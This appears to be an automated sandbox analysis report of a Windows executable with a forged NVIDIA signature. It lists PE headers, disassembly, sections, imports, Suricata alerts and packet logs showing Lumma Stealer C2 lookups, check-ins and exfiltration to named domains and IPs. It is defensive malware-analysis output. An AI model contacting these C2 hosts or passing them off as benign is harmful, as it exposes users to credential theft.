                                                                                                                                                                                                                                                        DLL Characteristics:DYNAMIC_BASE, NO_ISOLATION, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                        Time Stamp:0x676E98E6 [Fri Dec 27 12:09:10 2024 UTC]
                                                                                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                                                                                        OS Version Major:6
                                                                                                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                                                                                                        File Version Major:6
                                                                                                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                                                                                                        Subsystem Version Major:6
                                                                                                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                                                                                                        Import Hash:96d90e8808da099bc17e050394f447e7

                                                                                                                                                                                                                                                        Authenticode Signature

                                                                                                                                                                                                                                                        Signature Valid:false
                                                                                                                                                                                                                                                        Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                                                                                                                                                                                                        Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                                                                                        Error Number:-2146869232
                                                                                                                                                                                                                                                        Not Before, Not After
                                                                                                                                                                                                                                                        • 13/01/2023 00:00:00 16/01/2026 23:59:59
                                                                                                                                                                                                                                                        Subject Chain
                                                                                                                                                                                                                                                        • CN=NVIDIA Corporation, OU=2-J, O=NVIDIA Corporation, L=Santa Clara, S=California, C=US
                                                                                                                                                                                                                                                        Version:3
                                                                                                                                                                                                                                                        Thumbprint MD5:5F1B6B6C408DB2B4D60BAA489E9A0E5A
                                                                                                                                                                                                                                                        Thumbprint SHA-1:15F760D82C79D22446CC7D4806540BF632B1E104
                                                                                                                                                                                                                                                        Thumbprint SHA-256:28AF76241322F210DA473D9569EFF6F27124C4CA9F43933DA547E8D068B0A95D
                                                                                                                                                                                                                                                        Serial:0997C56CAA59055394D9A9CDB8BEEB56

                                                                                                                                                                                                                                                        Entrypoint Preview

                                                                                                                                                                                                                                                        Instruction
                                                                                                                                                                                                                                                        call 00007F0400E6275Ah
                                                                                                                                                                                                                                                        jmp 00007F0400E625BDh
                                                                                                                                                                                                                                                        mov ecx, dword ptr [0043B680h]
                                                                                                                                                                                                                                                        push esi
                                                                                                                                                                                                                                                        push edi
                                                                                                                                                                                                                                                        mov edi, BB40E64Eh
                                                                                                                                                                                                                                                        mov esi, FFFF0000h
                                                                                                                                                                                                                                                        cmp ecx, edi
                                                                                                                                                                                                                                                        je 00007F0400E62756h
                                                                                                                                                                                                                                                        test esi, ecx
                                                                                                                                                                                                                                                        jne 00007F0400E62778h
                                                                                                                                                                                                                                                        call 00007F0400E62781h
                                                                                                                                                                                                                                                        mov ecx, eax
                                                                                                                                                                                                                                                        cmp ecx, edi
                                                                                                                                                                                                                                                        jne 00007F0400E62759h
                                                                                                                                                                                                                                                        mov ecx, BB40E64Fh
                                                                                                                                                                                                                                                        jmp 00007F0400E62760h
                                                                                                                                                                                                                                                        test esi, ecx
                                                                                                                                                                                                                                                        jne 00007F0400E6275Ch
                                                                                                                                                                                                                                                        or eax, 00004711h
                                                                                                                                                                                                                                                        shl eax, 10h
                                                                                                                                                                                                                                                        or ecx, eax
                                                                                                                                                                                                                                                        mov dword ptr [0043B680h], ecx
                                                                                                                                                                                                                                                        not ecx
                                                                                                                                                                                                                                                        pop edi
                                                                                                                                                                                                                                                        mov dword ptr [0043B6C0h], ecx
                                                                                                                                                                                                                                                        pop esi
                                                                                                                                                                                                                                                        ret
                                                                                                                                                                                                                                                        push ebp
                                                                                                                                                                                                                                                        mov ebp, esp
                                                                                                                                                                                                                                                        sub esp, 14h
                                                                                                                                                                                                                                                        lea eax, dword ptr [ebp-0Ch]
                                                                                                                                                                                                                                                        xorps xmm0, xmm0
                                                                                                                                                                                                                                                        push eax
                                                                                                                                                                                                                                                        movlpd qword ptr [ebp-0Ch], xmm0
                                                                                                                                                                                                                                                        call dword ptr [00436D00h]
                                                                                                                                                                                                                                                        mov eax, dword ptr [ebp-08h]
                                                                                                                                                                                                                                                        xor eax, dword ptr [ebp-0Ch]
                                                                                                                                                                                                                                                        mov dword ptr [ebp-04h], eax
                                                                                                                                                                                                                                                        call dword ptr [00436CB8h]
                                                                                                                                                                                                                                                        xor dword ptr [ebp-04h], eax
                                                                                                                                                                                                                                                        call dword ptr [00436CB4h]
                                                                                                                                                                                                                                                        xor dword ptr [ebp-04h], eax
                                                                                                                                                                                                                                                        lea eax, dword ptr [ebp-14h]
                                                                                                                                                                                                                                                        push eax
                                                                                                                                                                                                                                                        call dword ptr [00436D50h]
                                                                                                                                                                                                                                                        mov eax, dword ptr [ebp-10h]
                                                                                                                                                                                                                                                        lea ecx, dword ptr [ebp-04h]
                                                                                                                                                                                                                                                        xor eax, dword ptr [ebp-14h]
                                                                                                                                                                                                                                                        xor eax, dword ptr [ebp-04h]
                                                                                                                                                                                                                                                        xor eax, ecx
                                                                                                                                                                                                                                                        leave
                                                                                                                                                                                                                                                        ret
                                                                                                                                                                                                                                                        mov eax, 00004000h
                                                                                                                                                                                                                                                        ret
                                                                                                                                                                                                                                                        push 0043CF48h
                                                                                                                                                                                                                                                        call dword ptr [00436D28h]
                                                                                                                                                                                                                                                        ret
                                                                                                                                                                                                                                                        push 00030000h
                                                                                                                                                                                                                                                        push 00010000h
                                                                                                                                                                                                                                                        push 00000000h
                                                                                                                                                                                                                                                        call 00007F0400E69533h
                                                                                                                                                                                                                                                        add esp, 0Ch

                                                                                                                                                                                                                                                        Data Directories

                                                                                                                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x36a7c0x3c.rdata
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x8d0000x3fc.rsrc
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x884000x2628.bss
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x3f0000x2744.reloc
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x326080x18.rdata
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2ea980xc0.rdata
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x36c3c0x184.rdata
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                                        Sections

                                                                                                                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                        .text0x10000x2b4ca0x2b600ebf84c6b836020b1a66433a898baeab7False0.5443702719740634data6.596404756541432IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                        .rdata0x2d0000xc50c0xc60096e76e7ef084461591b1dcd4c2131f05False0.40260022095959597data4.741850626178578IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                        .data0x3a0000x37140x2800d87fd4546a2b39263a028b496b33108fFalse0.29814453125data5.024681407682101IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                        .tls0x3e0000x90x2001f354d76203061bfdd5a53dae48d5435False0.033203125data0.020393135236084953IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                        .reloc0x3f0000x27440x2800c7508b57e36483307c47b7dd73fc0c85False0.75166015625data6.531416896423856IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                        .bss0x420000x4ac000x4ac002a12ee53d309eb20fe02fb4fac5edd43False1.0003298756270902data7.999404208479229IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                        .rsrc0x8d0000x3fc0x4006a4851071664eb0d5787860b0928a2faFalse0.4443359375data3.391431520369637IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                                        Resources

                                                                                                                                                                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                        RT_VERSION0x8d0580x3a4dataEnglishUnited States0.44849785407725323

                                                                                                                                                                                                                                                        Imports

                                                                                                                                                                                                                                                        DLLImport
                                                                                                                                                                                                                                                        KERNEL32.dllAcquireSRWLockExclusive, CloseHandle, CloseThreadpoolWork, CompareStringW, CreateFileW, CreateThread, CreateThreadpoolWork, DecodePointer, DeleteCriticalSection, EncodePointer, EnterCriticalSection, EnumSystemLocalesW, ExitProcess, ExitThread, FindClose, FindFirstFileExW, FindNextFileW, FlushFileBuffers, FreeEnvironmentStringsW, FreeLibrary, FreeLibraryAndExitThread, FreeLibraryWhenCallbackReturns, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetConsoleWindow, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetExitCodeThread, GetFileSize, GetFileSizeEx, GetFileType, GetLastError, GetLocaleInfoW, GetModuleFileNameW, GetModuleHandleA, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemTimeAsFileTime, GetUserDefaultLCID, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitOnceBeginInitialize, InitOnceComplete, InitializeCriticalSectionAndSpinCount, InitializeCriticalSectionEx, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, IsValidLocale, LCMapStringEx, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReadConsoleW, ReadFile, ReleaseSRWLockExclusive, RtlUnwind, SetEnvironmentVariableW, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, SleepConditionVariableSRW, SubmitThreadpoolWork, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, TryAcquireSRWLockExclusive, UnhandledExceptionFilter, WaitForSingleObjectEx, WakeAllConditionVariable, WideCharToMultiByte, WriteConsoleW, WriteFile
                                                                                                                                                                                                                                                        USER32.dllShowWindow

                                                                                                                                                                                                                                                        Possible Origin

                                                                                                                                                                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                        EnglishUnited States

                                                                                                                                                                                                                                                        Network Behavior

                                                                                                                                                                                                                                                        Suricata IDS Alerts

                                                                                                                                                                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                        2025-01-01T21:27:58.265380+01002058582ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mindhandru .buzz)1192.168.2.4638821.1.1.153UDP
                                                                                                                                                                                                                                                        2025-01-01T21:27:58.277210+01002058584ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (prisonyfork .buzz)1192.168.2.4652211.1.1.153UDP
                                                                                                                                                                                                                                                        2025-01-01T21:27:58.287510+01002058586ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rebuildeso .buzz)1192.168.2.4593171.1.1.153UDP
                                                                                                                                                                                                                                                        2025-01-01T21:27:58.298392+01002058588ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (scentniej .buzz)1192.168.2.4536011.1.1.153UDP
                                                                                                                                                                                                                                                        2025-01-01T21:27:58.309461+01002058580ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (inherineau .buzz)1192.168.2.4569721.1.1.153UDP
                                                                                                                                                                                                                                                        2025-01-01T21:27:58.319723+01002058590ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (screwamusresz .buzz)1192.168.2.4530171.1.1.153UDP
                                                                                                                                                                                                                                                        2025-01-01T21:27:58.336400+01002058572ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (appliacnesot .buzz)1192.168.2.4654321.1.1.153UDP
                                                                                                                                                                                                                                                        2025-01-01T21:27:58.358476+01002058576ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cashfuzysao .buzz)1192.168.2.4583121.1.1.153UDP
                                                                                                                                                                                                                                                        2025-01-01T21:27:58.370472+01002058578ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (hummskitnj .buzz)1192.168.2.4593521.1.1.153UDP
                                                                                                                                                                                                                                                        2025-01-01T21:27:59.029778+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449733104.102.49.254443TCP
                                                                                                                                                                                                                                                        2025-01-01T21:27:59.548271+01002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.449733104.102.49.254443TCP
                                                                                                                                                                                                                                                        2025-01-01T21:28:00.167445+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449734172.67.157.254443TCP
                                                                                                                                                                                                                                                        2025-01-01T21:28:00.594397+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449734172.67.157.254443TCP
                                                                                                                                                                                                                                                        2025-01-01T21:28:00.594397+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449734172.67.157.254443TCP
                                                                                                                                                                                                                                                        2025-01-01T21:28:01.084272+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449735172.67.157.254443TCP
                                                                                                                                                                                                                                                        2025-01-01T21:28:01.576540+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449735172.67.157.254443TCP
                                                                                                                                                                                                                                                        2025-01-01T21:28:01.576540+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449735172.67.157.254443TCP
                                                                                                                                                                                                                                                        2025-01-01T21:28:02.348216+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449736172.67.157.254443TCP
                                                                                                                                                                                                                                                        2025-01-01T21:28:03.506865+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449737172.67.157.254443TCP
                                                                                                                                                                                                                                                        2025-01-01T21:28:04.927121+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449738172.67.157.254443TCP
                                                                                                                                                                                                                                                        2025-01-01T21:28:06.365717+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449739172.67.157.254443TCP
                                                                                                                                                                                                                                                        2025-01-01T21:28:07.104797+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449739172.67.157.254443TCP
                                                                                                                                                                                                                                                        2025-01-01T21:28:08.097129+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449740172.67.157.254443TCP
                                                                                                                                                                                                                                                        2025-01-01T21:28:13.289406+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449741172.67.157.254443TCP
                                                                                                                                                                                                                                                        2025-01-01T21:28:13.765451+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449741172.67.157.254443TCP

                                                                                                                                                                                                                                                        Network Port Distribution

                                                                                                                                                                                                                                                        TCP Packets

                                                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                        Jan 1, 2025 21:27:58.393151999 CET49733443192.168.2.4104.102.49.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:27:58.393177986 CET44349733104.102.49.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:27:58.393274069 CET49733443192.168.2.4104.102.49.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:27:58.396275043 CET49733443192.168.2.4104.102.49.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:27:58.396290064 CET44349733104.102.49.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:27:59.029544115 CET44349733104.102.49.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:27:59.029778004 CET49733443192.168.2.4104.102.49.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:27:59.036596060 CET49733443192.168.2.4104.102.49.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:27:59.036613941 CET44349733104.102.49.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:27:59.036818027 CET44349733104.102.49.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:27:59.089294910 CET49733443192.168.2.4104.102.49.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:27:59.107175112 CET49733443192.168.2.4104.102.49.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:27:59.151329041 CET44349733104.102.49.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:27:59.548297882 CET44349733104.102.49.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:27:59.548322916 CET44349733104.102.49.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:27:59.548329115 CET44349733104.102.49.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:27:59.548366070 CET44349733104.102.49.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:27:59.548382044 CET44349733104.102.49.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:27:59.548420906 CET49733443192.168.2.4104.102.49.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:27:59.548449993 CET44349733104.102.49.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:27:59.548465014 CET49733443192.168.2.4104.102.49.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:27:59.548501968 CET49733443192.168.2.4104.102.49.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:27:59.650708914 CET44349733104.102.49.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:27:59.650726080 CET44349733104.102.49.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:27:59.650784016 CET49733443192.168.2.4104.102.49.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:27:59.650795937 CET44349733104.102.49.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:27:59.650845051 CET49733443192.168.2.4104.102.49.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:27:59.655755043 CET44349733104.102.49.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:27:59.655823946 CET49733443192.168.2.4104.102.49.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:27:59.655829906 CET44349733104.102.49.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:27:59.655839920 CET44349733104.102.49.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:27:59.655874968 CET49733443192.168.2.4104.102.49.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:27:59.656786919 CET49733443192.168.2.4104.102.49.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:27:59.656799078 CET44349733104.102.49.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:27:59.678586006 CET49734443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:27:59.678627968 CET44349734172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:27:59.678711891 CET49734443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:27:59.678987026 CET49734443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:27:59.678998947 CET44349734172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:00.167344093 CET44349734172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:00.167444944 CET49734443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:00.169950962 CET49734443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:00.169960976 CET44349734172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:00.170176029 CET44349734172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:00.171427011 CET49734443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:00.171454906 CET49734443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:00.171497107 CET44349734172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:00.594372988 CET44349734172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:00.594444990 CET44349734172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:00.594501972 CET49734443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:00.594681025 CET49734443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:00.594697952 CET44349734172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:00.594707966 CET49734443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:00.594713926 CET44349734172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:00.616163015 CET49735443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:00.616200924 CET44349735172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:00.616313934 CET49735443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:00.616559029 CET49735443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:00.616574049 CET44349735172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:01.084188938 CET44349735172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:01.084271908 CET49735443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:01.085988998 CET49735443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:01.086000919 CET44349735172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:01.086222887 CET44349735172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:01.087364912 CET49735443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:01.087387085 CET49735443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:01.087433100 CET44349735172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:01.576577902 CET44349735172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:01.576630116 CET44349735172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:01.576666117 CET44349735172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:01.576682091 CET49735443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:01.576694965 CET44349735172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:01.576756954 CET49735443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:01.576762915 CET44349735172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:01.576797962 CET44349735172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:01.576832056 CET44349735172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:01.576837063 CET49735443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:01.576841116 CET44349735172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:01.576883078 CET49735443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:01.576885939 CET44349735172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:01.577173948 CET44349735172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:01.577214956 CET44349735172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:01.577225924 CET49735443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:01.577230930 CET44349735172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:01.577263117 CET49735443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:01.581245899 CET44349735172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:01.620605946 CET49735443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:01.665915966 CET44349735172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:01.665981054 CET44349735172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:01.666011095 CET44349735172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:01.666028976 CET49735443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:01.666034937 CET44349735172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:01.666094065 CET49735443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:01.666098118 CET44349735172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:01.666110992 CET44349735172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:01.666153908 CET49735443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:01.666311979 CET49735443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:01.666323900 CET44349735172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:01.666368961 CET49735443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:01.666374922 CET44349735172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:01.889947891 CET49736443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:01.889998913 CET44349736172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:01.890077114 CET49736443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:01.890394926 CET49736443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:01.890409946 CET44349736172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:02.348130941 CET44349736172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:02.348216057 CET49736443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:02.349628925 CET49736443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:02.349638939 CET44349736172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:02.349852085 CET44349736172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:02.351109028 CET49736443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:02.351274014 CET49736443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:02.351303101 CET44349736172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:02.351372004 CET49736443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:02.351378918 CET44349736172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:02.983479023 CET44349736172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:02.983620882 CET44349736172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:02.983695984 CET49736443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                        Jan 1, 2025 21:28:02.983797073 CET49736443192.168.2.4172.67.157.254
